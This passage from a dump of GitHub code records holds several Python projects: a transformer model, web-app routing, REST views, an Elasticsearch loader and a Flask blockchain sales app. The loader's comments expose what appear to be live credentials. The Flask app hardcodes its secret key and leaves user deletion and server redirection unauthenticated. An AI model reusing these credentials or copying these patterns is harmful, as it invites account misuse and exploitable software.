"usage_type": "name"}, {"api_name": "typing.List", "line_number": 83, "usage_type": "name"}]} +{"seq_id": "7965984604", "text": "from copy import deepcopy as c\n\nimport torch.nn as nn\nimport torch.nn.functional as f\n\nfrom model.decoder import Decoder, DecoderLayer\nfrom model.encoder import Encoder, EncoderLayer\nfrom model.layers import MultiLayerAttention, PositionwiseFeedForward, PositionalEncoding, Embeddings\n\n\nclass Generator(nn.Module):\n def __init__(self, d_model, vocab):\n super(Generator, self).__init__()\n self.proj = nn.Linear(d_model, vocab)\n\n def forward(self, x):\n return f.log_softmax(self.proj(x), dim=-1)\n\n\nclass EncoderDecoder(nn.Module):\n def __init__(self, encoder, decoder, src_embed, tgt_embed, generator):\n super(EncoderDecoder, self).__init__()\n self.encoder = encoder\n self.decoder = decoder\n self.src_embed = src_embed\n self.tgt_embed = tgt_embed\n self.generator = generator\n\n def encode(self, src, src_mask):\n return self.encoder(self.src_embed(src), src_mask)\n\n def decode(self, mem, src_mask, tgt, tgt_msk):\n return self.decoder(self.tgt_embed(tgt), mem, src_mask, tgt_msk)\n\n def forward(self, src, tgt, src_mask, tgt_mask):\n return self.decode(self.encode(src, src_mask), src_mask, tgt,\n tgt_mask)\n\n\ndef make_model(src_voc, tgt_voc, n=6, d_model=512, d_ff=2048, h=8, dropout=0.1):\n attn = MultiLayerAttention(h, d_model)\n ff = PositionwiseFeedForward(d_model, d_ff, dropout)\n pos = PositionalEncoding(d_model, dropout)\n model = EncoderDecoder(Encoder(EncoderLayer(d_model, c(attn), c(ff), dropout), n),\n Decoder(DecoderLayer(d_model, c(attn), c(attn), c(ff), dropout), n),\n nn.Sequential(Embeddings(d_model, src_voc), c(pos)),\n nn.Sequential(Embeddings(d_model, tgt_voc), c(pos)),\n Generator(d_model, tgt_voc))\n for p in model.parameters():\n if p.dim() > 1:\n nn.init.xavier_uniform_(p)\n return model\n", "repo_name": "nobodyminus/transformer", "sub_path": "model/model.py", "file_name": "model.py", "file_ext": "py", "file_size_in_byte": 1970, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "torch.nn.Module", "line_number": 11, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 11, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 14, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 14, "usage_type": "name"}, {"api_name": "torch.nn.functional.log_softmax", "line_number": 17, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 17, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 20, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 20, "usage_type": "name"}, {"api_name": "model.layers.MultiLayerAttention", "line_number": 41, "usage_type": "call"}, {"api_name": "model.layers.PositionwiseFeedForward", "line_number": 42, "usage_type": "call"}, {"api_name": "model.layers.PositionalEncoding", "line_number": 43, "usage_type": "call"}, {"api_name": "model.decoder", "line_number": 44, "usage_type": "name"}, {"api_name": "model.encoder.Encoder", "line_number": 44, "usage_type": "call"}, {"api_name": "model.encoder.EncoderLayer", "line_number": 44, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 44, "usage_type": "call"}, {"api_name": "model.decoder.Decoder", "line_number": 45, "usage_type": "call"}, {"api_name": "model.decoder.DecoderLayer", "line_number": 45, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 45, 
"usage_type": "call"}, {"api_name": "torch.nn.Sequential", "line_number": 46, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 46, "usage_type": "name"}, {"api_name": "model.layers.Embeddings", "line_number": 46, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 46, "usage_type": "call"}, {"api_name": "torch.nn.Sequential", "line_number": 47, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 47, "usage_type": "name"}, {"api_name": "model.layers.Embeddings", "line_number": 47, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 47, "usage_type": "call"}, {"api_name": "model.decoder.parameters", "line_number": 49, "usage_type": "call"}, {"api_name": "model.decoder", "line_number": 49, "usage_type": "name"}, {"api_name": "torch.nn.init.xavier_uniform_", "line_number": 51, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 51, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 51, "usage_type": "name"}, {"api_name": "model.decoder", "line_number": 52, "usage_type": "name"}]} +{"seq_id": "40964986764", "text": "import logging\n\nfrom pyramid.config import Configurator\nfrom pyramid_beaker import session_factory_from_settings\nfrom pyramid.decorator import reify\nfrom pyramid.request import Request as BaseRequest\nfrom pyramid.security import authenticated_userid\nfrom pyramid.exceptions import Forbidden\n\nfrom marteau import queue\n\n\nclass Request(BaseRequest):\n \"\"\"\n Custom request class\n \"\"\"\n @reify\n def user(self):\n \"\"\"\n Get the logged in user\n \"\"\"\n return authenticated_userid(self)\n\n\ndef main(global_config, **settings):\n # defaults\n if 'mako.directories' not in settings:\n settings['mako.directories'] = 'marteauweb:templates'\n\n session_factory = session_factory_from_settings(settings)\n\n # configure the waitress logger\n logger = logging.getLogger('waitress')\n logger.setLevel(logging.DEBUG)\n ch = logging.StreamHandler()\n ch.setLevel(logging.DEBUG)\n logger.addHandler(ch)\n\n # creating the config and the queue\n config = Configurator(settings=settings, session_factory=session_factory)\n config.registry['queue'] = queue.Queue()\n\n # Use our custom Request class\n config.set_request_factory(Request)\n\n # Both of our chosen policies configure a \"forbidden view\" to handle\n # unauthenticated access. 
We have to resolve this conflict by explicitly\n    # picking which one we want to use.\n    config.add_forbidden_view(\"pyramid_persona.views.forbidden\")\n\n    # routing\n    config.add_route('index', '/')\n    config.add_route('profile', '/profile')\n    config.add_route('purge', '/purge')\n    config.add_route('reset', '/reset')\n    config.add_route('test', '/test')\n    config.add_route('cancel', '/test/{jobid}/cancel')\n    config.add_route('delete', '/test/{jobid}/delete')\n    config.add_route('replay', '/test/{jobid}/replay')\n    config.add_route('job', '/test/{jobid}')\n    config.add_route('nodes', '/nodes')\n    config.add_route('node_enable', '/nodes/{name}/enable')\n    config.add_route('node_test', '/nodes/{name}/test')\n    config.add_route('node', '/nodes/{name}')\n    config.add_route('report_index', '/report/{jobid}')\n    config.add_route('report_file', '/report/{jobid}/{filename:.*}')\n    config.add_route('docs_file', '/docs/{file:.*}')\n    config.add_route('docs_index', '/docs')\n    config.add_route('addjob', '/addjob')\n    config.add_route('fixture_options', '/fixture_options/{fixture:.*}')\n    config.add_route('project_options', '/project_options/{project:.*}')\n    config.add_route('hosts', '/hosts')\n    config.add_route('verify_host', '/hosts/{host:.*}/verify')\n    config.add_route('host', '/hosts/{host:.*}')\n    config.add_static_view('media', 'marteauweb:media/')\n    config.add_route('karaoke', '/media/marteau.kar')\n    config.add_route('socket_io', 'socket.io/*remaining')\n\n    config.scan(\"marteauweb.views\")\n    config.scan(\"marteauweb.socketio_service\")\n    return config.make_wsgi_app()\n", "repo_name": "mozilla-services/marteau-web", "sub_path": "marteauweb/wsgiapp.py", "file_name": "wsgiapp.py", "file_ext": "py", "file_size_in_byte": 2914, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "pyramid.request.Request", "line_number": 13, "usage_type": "name"}, {"api_name": "pyramid.security.authenticated_userid", "line_number": 22, "usage_type": "call"}, {"api_name": "pyramid.decorator.reify", "line_number": 17, "usage_type": "name"}, {"api_name": "pyramid_beaker.session_factory_from_settings", "line_number": 30, "usage_type": "call"}, {"api_name": "logging.getLogger", "line_number": 33, "usage_type": "call"}, {"api_name": "logging.DEBUG", "line_number": 34, "usage_type": "attribute"}, {"api_name": "logging.StreamHandler", "line_number": 35, "usage_type": "call"}, {"api_name": "logging.DEBUG", "line_number": 36, "usage_type": "attribute"}, {"api_name": "pyramid.config.Configurator", "line_number": 40, "usage_type": "call"}, {"api_name": "marteau.queue.Queue", "line_number": 41, "usage_type": "call"}, {"api_name": "marteau.queue", "line_number": 41, "usage_type": "name"}]} +{"seq_id": "5350548845", "text": "from rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom .models import *\nfrom .mission import *\nfrom .user import *\nfrom .message import to_json as message_to_json\nfrom django.utils import timezone\nfrom .someFuncs import *\n\n\nclass DealFindMissions(APIView):\n    @staticmethod\n    def post(request, user_ID):\n        uid = checkUID(request.data)\n        if uid == 0:\n            return Response(\"Unauthorized\", 401)\n        elif User.objects.filter(id=user_ID).count() == 0:\n            return Response(\"User Not Found\", 404)\n        elif uid != user_ID:\n            return Response(\"Unauthorized\", 401)\n        else:\n            missions = request.data.get('missionIDs', [])\n            if len(missions) == 0:\n                return Response(\"Bad request\", 400)\n            else:\n                missions.sort()\n                mission_detail = []\n
                for mission_id in missions:\n                    if Mission.objects.filter(id=mission_id).count() == 0:\n                        return Response(\"mission Not Found\", 404)\n                    else:\n                        mission_detail.append(mission_to_json(Mission.objects.get(id=mission_id)))\n                response = Response(mission_detail, 200)\n                return response\n\n\nclass DealFindMessages(APIView):\n    @staticmethod\n    def post(request, user_ID):\n        uid = checkUID(request.data)\n        if uid == 0:\n            return Response(\"Unauthorized\", 401)\n        elif User.objects.filter(id=user_ID).count() == 0:\n            return Response(\"User Not Found\", 404)\n        elif uid != user_ID:\n            return Response(\"Unauthorized\", 401)\n        else:\n            messages = request.data.get('messageIDs', [])\n            if len(messages) == 0:\n                return Response(\"Bad request\", 400)\n            else:\n                messages.sort()\n                message_detail = []\n                for message_id in messages:\n                    if Message.objects.filter(id=message_id).count() == 0:\n                        return Response(\"message Not Found\", 404)\n                    else:\n                        message_detail.append(message_to_json(Message.objects.get(id=message_id)))\n                response = Response(message_detail, 200)\n                return response\n\n\nclass DealFindEvaluations(APIView):\n    @staticmethod\n    def post(request, user_ID):\n        uid = checkUID(request.data)\n        if uid == 0:\n            return Response(\"Unauthorized\", 401)\n        elif User.objects.filter(id=user_ID).count() == 0:\n            return Response(\"User Not Found\", 404)\n        elif uid != user_ID:\n            return Response(\"Unauthorized\", 401)\n        else:\n            evaluations = request.data.get('evaluationIDs', [])\n            if len(evaluations) == 0:\n                return Response(\"Bad request\", 400)\n            else:\n                evaluations.sort()\n                evaluation_detail = []\n                for evaluation_id in evaluations:\n                    if Evaluation.objects.filter(id=evaluation_id).count() == 0:\n                        return Response(\"evaluation Not Found\", 404)\n                    else:\n                        evaluation_detail.append(evaluation_to_json(Evaluation.objects.get(id=evaluation_id)))\n                response = Response(evaluation_detail, 200)\n                return response\n\n\nclass DealFindUsers(APIView):\n    @staticmethod\n    def post(request, getter_ID, mission_ID):\n        uid = checkUID(request.data)\n        if uid == 0:\n            return Response(\"Unauthorized\", 401)\n        elif uid != getter_ID:\n            return Response(\"Unauthorized\", 401)\n        elif User.objects.filter(id=getter_ID).count() == 0:\n            return Response(\"getter Not Found\", 404)\n        elif Mission.objects.filter(id=mission_ID).count() == 0:\n            return Response(\"mission Not Found\", 404)\n        else:\n            gettees = request.data.get('getteeIDs', [])\n            if len(gettees) == 0:\n                return Response(\"Bad request\", 400)\n            else:\n                mission = Mission.objects.get(id=mission_ID)\n                gettee_detail = []\n                for gettee_ID in gettees:\n                    if User.objects.filter(id=gettee_ID).count() == 0:\n                        return Response(\"gettee Not Found\", 404)\n                    elif gettee_ID == getter_ID:\n                        return Response(\"Bad Request\", 400)\n                    elif Mission.objects.get(id=mission_ID).members.filter(id=gettee_ID).count() == 0 \\\n                            and Mission.objects.get(id=mission_ID).publisher.id != gettee_ID \\\n                            and Mission.objects.get(id=mission_ID).applicants.filter(id=gettee_ID).count() == 0:\n                        return Response(\"Forbidden\", 403)\n                    elif gettee_ID == getter_ID:\n                        return Response(\"Bad Request\", 400)\n                    else:\n                        gettee = User.objects.get(id=gettee_ID)\n                        score = 0\n                        name = gettee.username\n                        evaluations = []\n                        for evaluation in gettee.evaluationsAsEvaluatee.all():\n                            score += evaluation.evaluationScore\n                            evaluations.append(evaluation.id)\n                        if gettee.evaluationsAsEvaluatee.all().count() != 0:\n                            score /= gettee.evaluationsAsEvaluatee.all().count()\n                        if mission.members.filter(id=getter_ID).count() != 0 \\\n                            or mission.publisher.id == getter_ID:\n
                            tele = gettee.tele\n                            data = {\"missionStatus\": \"tele can be seen\", \"tele\": tele, \"averageScore\": score,\n                                    \"username\": name, \"evaluationIDs\": evaluations}\n                            gettee_detail.append(data)\n                        else:\n                            data = {\"missionStatus\": \"tele can not be seen\", \"averageScore\": score, \"username\": name,\n                                    \"evaluationIDs\": evaluations}\n                            gettee_detail.append(data)\n        response = Response(gettee_detail, 200)\n        return response\n", "repo_name": "ddaa2000/PKUGrouper-Android", "sub_path": "backend/PkuGrouper/backend/finds.py", "file_name": "finds.py", "file_ext": "py", "file_size_in_byte": 6293, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "61", "api": [{"api_name": "rest_framework.views.APIView", "line_number": 11, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 16, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 18, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 20, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 24, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 30, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 33, "usage_type": "call"}, {"api_name": "rest_framework.views.APIView", "line_number": 37, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 42, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 44, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 46, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 50, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 56, "usage_type": "call"}, {"api_name": "message.to_json", "line_number": 58, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 59, "usage_type": "call"}, {"api_name": "rest_framework.views.APIView", "line_number": 63, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 68, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 70, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 72, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 76, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 82, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 85, "usage_type": "call"}, {"api_name": "rest_framework.views.APIView", "line_number": 89, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 94, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 96, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 98, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 100, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 104, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 110, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 112, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 116, "usage_type": "call"}, {"api_name": 
"rest_framework.response.Response", "line_number": 118, "usage_type": "call"}, {"api_name": "mission.members.filter", "line_number": 129, "usage_type": "call"}, {"api_name": "mission.members", "line_number": 129, "usage_type": "attribute"}, {"api_name": "mission.publisher", "line_number": 130, "usage_type": "attribute"}, {"api_name": "rest_framework.response.Response", "line_number": 139, "usage_type": "call"}]} +{"seq_id": "42922220008", "text": "from sodapy import Socrata\nimport requests\nfrom requests.auth import HTTPBasicAuth\nimport json\nimport argparse\nimport sys\nimport os\nimport re\n\n# Creates a parser. Parser is the thing where you add your arguments. \nparser = argparse.ArgumentParser(description='311 Requests Data')\n# In the parse, we have two arguments to add.\n# The first one is a required argument for the program to run. If page_size is not passed in, don’t let the program to run\nparser.add_argument('--page_size', type=int, help='how many rows to get per page', required=True)\n# The second one is an optional argument for the program to run. It means that with or without it your program should be able to work.\nparser.add_argument('--num_pages', type=int, help='how many pages to get in total')\n# Take the command line arguments passed in (sys.argv) and pass them through the parser.\n# Then you will end up with variables that contains page size and num pages. \nargs = parser.parse_args(sys.argv[1:])\nprint(args)\n\nINDEX_NAME=os.environ[\"INDEX_NAME\"]\nDATASET_ID=os.environ[\"DATASET_ID\"]\nAPP_TOKEN=os.environ[\"APP_TOKEN\"]\nES_HOST=os.environ[\"ES_HOST\"]\nES_USERNAME=os.environ[\"ES_USERNAME\"]\nES_PASSWORD=os.environ[\"ES_PASSWORD\"]\n\n#INDEX_NAME=\"fire\"\n#DATASET_ID=\"8m42-w767\"\n#APP_TOKEN=\"TksBNcbpTQxd3rUwbWl53LBPZ\"\n#ES_HOST =\"https://search-project01-greg-teo-ykdzvexlqrvboe3eofb2wyqypm.us-east-2.es.amazonaws.com\"\n#ES_USERNAME=\"gmteo\"\n#ES_PASSWORD=\"[1]Abcd1234\"\n\n\nif __name__ == '__main__':\n try:\n resp = requests.put(f\"{ES_HOST}/{INDEX_NAME}\", auth=HTTPBasicAuth(ES_USERNAME, ES_PASSWORD),\n json={\n \"settings\": {\n \"number_of_shards\": 1,\n \"number_of_replicas\": 1\n },\n \"mappings\": {\n \"properties\": {\n \"starfire_incident_id\": {\"type\": \"keyword\"},\n \"incident_datetime\": {\"type\": \"date\"},\n \"incident_borough\": {\"type\": \"keyword\"},\n \"zipcode\": {\"type\": \"keyword\"},\n \"incident_classification_group\": {\"type\": \"keyword\"},\n \"incident_response_seconds_qy\": {\"type\": \"float\"},\n \"engines_assigned_quantity\": {\"type\": \"float\"},\n }\n }, \n }\n )\n resp.raise_for_status()\n print(resp.json())\n \n except Exception as e:\n print(\"Index already exists! 
Skipping!\")\n \n es_rows=[]\n \n if args.num_pages is None:\n client = Socrata(\"data.cityofnewyork.us\", APP_TOKEN, timeout=10000)\n count = [int(s) for s in re.findall(r'-?\\d+\\.?\\d*', str(client.get(DATASET_ID, select='COUNT(*)', where='starfire_incident_id IS NOT NULL AND incident_datetime IS NOT NULL')))]\n #For testing purposes\n #count1 = count[0] - 8690000\n #When ready, change limit = count[0]\n rows = client.get(DATASET_ID, select='*' , where='starfire_incident_id IS NOT NULL AND incident_datetime IS NOT NULL', order = 'incident_datetime', limit = count[0])\n \n for row in rows:\n try:\n # Convert\n es_row = {}\n es_row[\"starfire_incident_id\"] = row[\"starfire_incident_id\"]\n es_row[\"incident_datetime\"] = row[\"incident_datetime\"]\n es_row[\"incident_borough\"] = row[\"incident_borough\"]\n es_row[\"zipcode\"] = row[\"zipcode\"]\n es_row[\"incident_classification_group\"] = row[\"incident_classification_group\"]\n es_row[\"incident_response_seconds_qy\"] = float(row[\"incident_response_seconds_qy\"])\n es_row[\"engines_assigned_quantity\"] = float(row[\"engines_assigned_quantity\"])\n \n except Exception as e:\n #Comment out print command if loading more than 100k\n #print (f\"Error!: {e}, skipping row: {row}\")\n continue\n \n es_rows.append(es_row)\n \n bulk_upload_data = \"\"\n for line in es_rows:\n #Comment out print command if loading more than 100k\n #print(f'Handling row {line[\"starfire_incident_id\"]}')\n action = '{\"index\": {\"_index\": \"' + INDEX_NAME + '\", \"_type\": \"_doc\", \"_id\": \"' + line[\"starfire_incident_id\"] + '\"}}'\n data = json.dumps(line)\n bulk_upload_data += f\"{action}\\n\"\n bulk_upload_data += f\"{data}\\n\"\n #print (bulk_upload_data)\n \n try:\n # Upload to Elasticsearch by creating a document\n resp = requests.post(f\"{ES_HOST}/_bulk\",\n # We upload es_row to Elasticsearch\n data=bulk_upload_data,auth=HTTPBasicAuth(ES_USERNAME, ES_PASSWORD), headers = {\"Content-Type\": \"application/x-ndjson\"})\n resp.raise_for_status()\n print ('Done!')\n print ('Total Number of Rows: ',count[0])\n print ('Total Number of Pages: None')\n print('Offset: 0')\n \n # If it fails, skip that row and move on.\n except Exception as e:\n print(f\"Failed to insert in ES: {e}\")\n \n #print(es_rows)\n es_rows.clear()\n \n else:\n for num_pages in range(args.num_pages):\n offset = num_pages * args.page_size\n client = Socrata(\"data.cityofnewyork.us\", APP_TOKEN, timeout=10000)\n rows = client.get(DATASET_ID, limit=args.page_size, where='starfire_incident_id IS NOT NULL AND incident_datetime IS NOT NULL', offset = {offset}, order = 'incident_datetime')\n \n for row in rows:\n try:\n # Convert\n es_row = {}\n es_row[\"starfire_incident_id\"] = row[\"starfire_incident_id\"]\n es_row[\"incident_datetime\"] = row[\"incident_datetime\"]\n es_row[\"incident_borough\"] = row[\"incident_borough\"]\n es_row[\"zipcode\"] = row[\"zipcode\"]\n es_row[\"incident_classification_group\"] = row[\"incident_classification_group\"]\n es_row[\"incident_response_seconds_qy\"] = float(row[\"incident_response_seconds_qy\"])\n es_row[\"engines_assigned_quantity\"] = float(row[\"engines_assigned_quantity\"])\n \n except Exception as e:\n #Comment out print command if loading more than 100k\n #print (f\"Error!: {e}, skipping row: {row}\")\n continue\n \n es_rows.append(es_row)\n #print(es_rows)\n #print('offset: ', offset)\n #print('num pages: ', num_pages)\n \n bulk_upload_data = \"\"\n for line in es_rows:\n #Comment out print command if loading more than 100k\n 
#print(f'Handling row {line[\"starfire_incident_id\"]}')\n                action = '{\"index\": {\"_index\": \"' + INDEX_NAME + '\", \"_type\": \"_doc\", \"_id\": \"' + line[\"starfire_incident_id\"] + '\"}}'\n                data = json.dumps(line)\n                bulk_upload_data += f\"{action}\\n\"\n                bulk_upload_data += f\"{data}\\n\"\n            #print (bulk_upload_data)\n            \n            try:\n                # Upload to Elasticsearch by creating a document\n                resp = requests.post(f\"{ES_HOST}/_bulk\",\n                    # We upload es_row to Elasticsearch\n                    data=bulk_upload_data,auth=HTTPBasicAuth(ES_USERNAME, ES_PASSWORD), headers = {\"Content-Type\": \"application/x-ndjson\"})\n                resp.raise_for_status()\n                \n            # If it fails, skip that row and move on.\n            except Exception as e:\n                print(f\"Failed to insert in ES: {e}\")\n                \n            #print(es_rows)\n            es_rows.clear()\n            \n        print ('Done!')\n        print ('Total Number of Rows: ',args.num_pages * args.page_size)\n        print ('Total Number of Pages: ', args.num_pages)\n        print('Offset for page',num_pages+1,': ', offset) \n", "repo_name": "gregteo/Big-Data-Technologies", "sub_path": "project01/src/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 8096, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 11, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 19, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 22, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 23, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 24, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 25, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 26, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 27, "usage_type": "attribute"}, {"api_name": "requests.put", "line_number": 39, "usage_type": "call"}, {"api_name": "requests.auth.HTTPBasicAuth", "line_number": 39, "usage_type": "call"}, {"api_name": "sodapy.Socrata", "line_number": 67, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 68, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 98, "usage_type": "call"}, {"api_name": "requests.post", "line_number": 105, "usage_type": "call"}, {"api_name": "requests.auth.HTTPBasicAuth", "line_number": 107, "usage_type": "call"}, {"api_name": "sodapy.Socrata", "line_number": 124, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 154, "usage_type": "call"}, {"api_name": "requests.post", "line_number": 161, "usage_type": "call"}, {"api_name": "requests.auth.HTTPBasicAuth", "line_number": 163, "usage_type": "call"}]} +{"seq_id": "70715551874", "text": "# export FLASK_APP=node_server.py\n# flask run --port 8000\n# export FLASK_APP=run.py\n# flask run\n\nfrom flask import Flask\nfrom flask import render_template, request, redirect, url_for, jsonify\nfrom forms import SignupForm, PostForm,LoginForm\nfrom werkzeug.urls import url_parse\nfrom models import User\nfrom flask_login import LoginManager, login_required, current_user, login_user, logout_user\nimport hashlib\nimport requests\nimport json\nimport datetime\n\n# Create the application instance\n# __name__: name of the application's module or package\napp = Flask(__name__)\n\napp.config['SECRET_KEY'] = '7110c8ae51a4b5af97be6534caef90e4bb9bdcb3380af008f90b23a5d1616bf319bc298105da20fe'\n\nlogin_manager = LoginManager(app)\nlogin_manager.login_view = 'login'\n\nposts = []\nnumposts = 0\n\nCONNECTED_NODE_ADDRESS = 
\"http://127.0.0.1:8000\"\n\ndef fetch_posts():\n \"\"\"\n Function to fetch the chain from a blockchain node, parse the\n data and store it locally.\n \"\"\"\n get_chain_address = \"{}/chain\".format(CONNECTED_NODE_ADDRESS)\n response = requests.get(get_chain_address)\n if response.status_code == 200:\n content = []\n chain = json.loads(response.content)\n for block in chain[\"chain\"]:\n for tx in block[\"transactions\"]:\n tx[\"index\"] = block[\"index\"]\n tx[\"hash\"] = block[\"previous_hash\"]\n content.append(tx)\n\n global posts\n posts = sorted(content, key=lambda k: k['timestamp'],\n reverse=True)\n\n# Decorador route encargado de indicar a Flask qué URL debe ejecutar su correspondiente función\n@app.route('/')\ndef index():\n\treturn render_template(\"base_template.html\")\n\n@app.route('/admin/post/', methods=[\"GET\", \"POST\"])\n@login_required\ndef post_form():\n form = PostForm()\n\n global numposts\n\n if form.validate_on_submit():\n total = form.total.data\n content = form.content.data\n\n post_object = {\"author\": current_user.name, \"content\": content, \"total\": total}\n\n numposts += 1\n\n new_tx_address = \"{}/new_transaction\".format(CONNECTED_NODE_ADDRESS)\n\n requests.post(new_tx_address,\n json=post_object,\n headers={'Content-type': 'application/json'})\n\n return redirect(url_for('post_form'))\n\n return render_template('admin/post_form.html', form = form)\n\n@app.route('/admin/postShopping', methods=[\"POST\"])\n@login_required\ndef postShopping():\n\n new_tx_address = \"{}/new_transaction_\".format(CONNECTED_NODE_ADDRESS)\n\n response = requests.post(new_tx_address,\n json=request.get_json(),\n headers={'Content-type': 'application/json'})\n\n if response.status_code == 201:\n return jsonify({\n \"status\": 201\n })\n\n return jsonify({\n \"status\": 400\n })\n\n@app.route('/admin/lectura/', methods=[\"GET\", \"POST\"])\n@login_required\ndef post_read():\n fetch_posts()\n\n if current_user.is_admin:\n return render_template('admin/post_read.html', title = 'Ventas realizadas', posts = posts, node_address=CONNECTED_NODE_ADDRESS, readable_time=timestamp_to_string)\n\n return redirect(url_for('index'))\n\n# Flask responde por defecto ante peticiones GET. 
To handle any other kind of request, it must be specified with the methods parameter\n@app.route(\"/signup/\", methods=[\"GET\", \"POST\"])\ndef show_signup_form():\n    if not current_user.is_admin:\n        return redirect(url_for('index'))\n\n    form = SignupForm()\n\n    if form.validate_on_submit():\n        name = form.name.data\n        email = form.email.data\n        password = form.password.data\n\n        # Create the user and save it\n        user_id = int(hashlib.md5(email.encode()).hexdigest()[:8], 16)\n\n        user = User(user_id, name, email, password)\n\n        # Save the user's data in the database\n        user.register(user)\n\n        # Leave the user logged in\n        # login_user(user, remember=True)\n\n        next_page = request.args.get('next', None)\n\n        if not next_page or url_parse(next_page).netloc != '':\n            next_page = url_for('index')\n\n        return redirect(next_page)\n    return render_template(\"signup_form.html\", form=form)\n\n\n@app.route(\"/admin/deleteUser\", methods=[\"GET\"])\ndef deleteUser():\n    if not current_user.is_admin:\n        return redirect(url_for('index'))\n\n    return render_template(\"admin/delete_user.html\")\n\n@app.route(\"/getSellers\", methods=[\"GET\"])\ndef getSellers():\n    return jsonify({\n        \"users\": User.getUsers()\n    })\n\n@app.route(\"/deleteAuser\", methods=[\"POST\"])\ndef deleteAuser():\n    content = request.get_json()\n\n    if not User.deleteUser(content[\"email\"]):\n        return \"Error\", 400\n    return \"User Deleted\", 200\n\n@app.route('/login', methods=['GET', 'POST'])\ndef login():\n    if current_user.is_authenticated:\n        return redirect(url_for('index'))\n\n    form = LoginForm()\n\n    if form.validate_on_submit():\n\n        userInfo = User.get_by_email(form.email.data, form.password.data)\n\n        if userInfo is not None:\n\n            user = User(userInfo.get('user_id'), userInfo.get('name'), userInfo.get('email'), userInfo.get('password'), userInfo.get('is_admin'))\n            user.set_object(user)\n\n            login_user(user, remember=form.remember_me.data)\n\n            next_page = request.args.get('next')\n\n            if not next_page or url_parse(next_page).netloc != '':\n                next_page = url_for('index')\n\n            return redirect(next_page)\n    return render_template('login_form.html', form=form)\n\n@app.route('/logout')\ndef logout():\n\n    mine = \"{}/mine\".format(CONNECTED_NODE_ADDRESS)\n    requests.get(mine)\n\n    logout_user()\n    return redirect(url_for('index'))\n\n@login_manager.user_loader\ndef load_user(user_id):\n    return User.get_by_id(user_id)\n\ndef timestamp_to_string(epoch_time):\n    return datetime.datetime.fromtimestamp(epoch_time).strftime('%a, %B %d, %Y %H:%M')\n\n@app.route('/defServer', methods=['POST'])\ndef defServer():\n    global CONNECTED_NODE_ADDRESS\n    content = request.get_json()\n    if \"server\" not in content:\n        return \"Error\", 400\n    CONNECTED_NODE_ADDRESS = content[\"server\"]\n    print(CONNECTED_NODE_ADDRESS)\n    return \"Success\", 200\n\n\n@app.route('/getServer', methods=['GET'])\ndef getServer():\n    return jsonify({\n        \"server\":CONNECTED_NODE_ADDRESS\n    })\n\napp.run(debug=True)\n", "repo_name": "iabrilvzqz/Criptografia", "sub_path": "Proyecto_Final/app/run.py", "file_name": "run.py", "file_ext": "py", "file_size_in_byte": 6365, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "flask.Flask", "line_number": 19, "usage_type": "call"}, {"api_name": "flask_login.LoginManager", "line_number": 23, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 37, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 